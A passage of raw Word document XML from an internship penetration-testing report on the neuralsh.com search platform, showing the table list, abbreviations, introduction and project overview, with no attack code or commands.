        <w:t>LIST OF TABLES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Table 4.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Testing tools used in this engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Table 5.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Complete findings register — twenty vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Table 5.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Severity distribution and CVSS score summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Table 5.3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Remediation priority roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>LIST OF ABBREVIATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">API         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Application Programming Interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CDN         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Content Delivery Network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cross-Origin Resource Sharing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSP         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Common Vulnerability Scoring System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Common Weakness Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWES        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Certified Web Exploitation Specialist (HTB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DMARC       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Domain-based Message Authentication, Reporting and Conformance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Domain Name System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hypertext Transfer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hypertext Transfer Protocol Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ITC         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Institution of Technology of Cambodia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JSON Web Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>National Institute of Standards and Technology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OSINT       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open Source Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open Web Application Security Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Simple Mail Transfer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SPF         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sender Policy Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Structured Query Language</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Secure Sockets Layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Transmission Control Protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Transport Layer Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">URL         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Uniform Resource Locator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VAPT        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability Assessment and Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Web Application Firewall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WHM         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Web Host Manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XFF         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Forwarded-For (HTTP header)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cross-Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:footerReference w:type="default" r:id="rId50"/>
          <w:pgSz w:w="11905" w:h="16837"/>
          <w:pgMar w:top="1133" w:right="1133" w:bottom="1133" w:left="1700"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This report presents the findings and methodology of a Vulnerability Assessment and Penetration Testing (VAPT) engagement conducted on neuralsh.com, an AI-powered neural search platform operated by Prestige Alliance Co., Ltd. The engagement was carried out as part of a four-month internship from February to May 2026, with full written authorization from the organization prior to any testing activities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Chapter 1 provides the project overview, objectives, scope, and a description of the company. Chapter 2 presents the theoretical foundations of penetration testing, including the OWASP framework and CVSS scoring system. Chapter 3 details the research methodology and tools used throughout the engagement. Chapter 4 covers the full implementation across five testing phases: reconnaissance, scanning and enumeration, vulnerability assessment, exploitation, and post-exploitation. Chapter 5 presents the complete findings register, attack chain analysis, and remediation roadmap. Chapter 6 concludes with a summary, lessons learned, and recommendations for future security improvements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 1: PROJECT OVERVIEW AND ORGANIZATIONAL CONTEXT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To begin this internship, it is important to lay out the foundation of the project — what was worked on, why it matters, and how the work was planned and carried out. This chapter introduces the project description, the problem that motivated it, the objectives set out at the start, the solutions proposed, the project scope, the action plan followed throughout the internship period, and a description of the organization where this internship was completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Project Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This internship project focused on enhancing the security posture of a live web application by conducting a structured Vulnerability Assessment and Penetration Testing (VAPT) engagement on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>neuralsh.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, an AI-powered neural search platform. The assessment was carried out under the supervision of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prestige Alliance Co., Ltd.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, which authorized and oversaw all testing activities in accordance with ethical hacking standards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The project involved scanning the target's external IP infrastructure, analyzing identified weaknesses, performing manual and automated testing across the application and network layers, and producing a formal security report detailing all findings, their severity, and recommended remediation steps. A total of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>20 vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> were discovered — including 4 Critical, 5 High, 7 Medium, and 4 Low severity findings — with two attack chains successfully exploited under controlled conditions. A follow-up verification scan on 10 June 2026 confirmed all original findings remained unpatched and uncovered three additional findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This work reflects the real-world responsibilities of a security intern: not only finding vulnerabilities, but understanding their impact, communicating risk clearly, and helping the organization take meaningful steps toward a stronger security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
